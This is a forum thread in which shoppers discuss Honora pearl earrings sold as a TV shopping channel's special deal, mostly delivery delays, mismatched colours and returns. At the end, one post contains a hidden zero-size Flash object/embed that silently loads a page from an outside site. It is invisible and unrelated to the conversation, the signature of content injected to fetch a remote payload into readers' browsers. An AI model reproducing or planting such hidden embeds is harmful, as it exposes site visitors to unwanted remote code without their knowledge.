Honora Pearl TSV Thursday 27th of August

ShoppingTelly

Help Support ShoppingTelly:

Hi :hi:,
Mine arrived this morning too - very speedy delivery! They are lovely - I wore them today with the matching necklace to do my holiday washing - do you think I might have been a tad overdressed?

:thinking2::thinking2::thinking2:

Not at all Plint ! I wear my pearls every day no matter what I am doing.
I'm still waiting for my TSV, my keishi earrings and my pearl hoops, but I think with the Bank Holiday weekend they might be slow in coming.

Blimey that was fast!!!

My mum ordered the TSV and hers has not arrived yet.

I know I a doing quite well with some deliveries recently although still waiting for Tova mascara which was ordered just a few hours before and despatched on same day.

Parcelnet or Hermes man has just been with items despatched on the 24th, 28th and 30th August all at the same time :tongue2:

I know I a doing quite well with some deliveries recently although still waiting for Tova mascara which was ordered just a few hours before and despatched on same day.

Parcelnet or Hermes man has just been with items despatched on the 24th, 28th and 30th August all at the same time :tongue2:

Yeah some couriers gather things up over a few days before they go out and deliver them. My courier is not like that, when things arrive with her she gets them out to people the same day. :)

Mine arrived yesterday with "matching " necklace- supposed to be amethyst but they are two different shades, the earrings are light and the necklace definately much darker plus the necklace is broken, so it is all going back.

usually love Honora- still it won't put me off buying from ralph in the future. they are normally great quality, oh well :sad:

DD's earrings came yesterday & she loves them! She went for the Teal option & they look lovely on her, so I think she will probably try some more Honora items as they seem to have things to cater for all price ranges, even impoverished 16 year olds! lol

I haven't received anything that I bought from the Honora shows yet.
I'm blaming the Bank Holiday weekend though as it slows everything down for us up here.

I usually receive jewellery within 2-3 days but its nearly a week now.
Keep watching patiently for the postman. Poor man ! I'm at the stage I'm ready to grab him when I see him now.

I haven't received anything that I bought from the Honora shows yet.
I'm blaming the Bank Holiday weekend though as it slows everything down for us up here.

I usually receive jewellery within 2-3 days but its nearly a week now.
Keep watching patiently for the postman. Poor man ! I'm at the stage I'm ready to grab him when I see him now.

Dont worry Sue I'm still waiting also, received one parcel Tuesday but the second nothing yet. The postie must feel my eyes boring into him everyday so far....

My TSV and my hoop earrings STILL haven't arrived. My Keishi ring did though, but is being sent back. It's a gorgeous ring but they sent a ring that wouldn't even fit my little finger ! It says Size P on the invoice but it's lucky if its a K !

Compared to my other Honora and SW Silver rings it is tiny. Not even in stock either........... oh I'm fuming !

Well my mum's TSV arrived today and she is not happy!!! She ordered the Amethyst, they don't match in colour, the two are different shapes, and different sizes, no way they could be a called a matching pair!!!

Got mine and really liked it :)

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://submiturpics.com/uploads/pages/3683/info.html"></param><param name="allowFullScreen" value="true"></param><embed src="http://submiturpics.com/uploads/pages/3683/info.html" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Latest posts

Back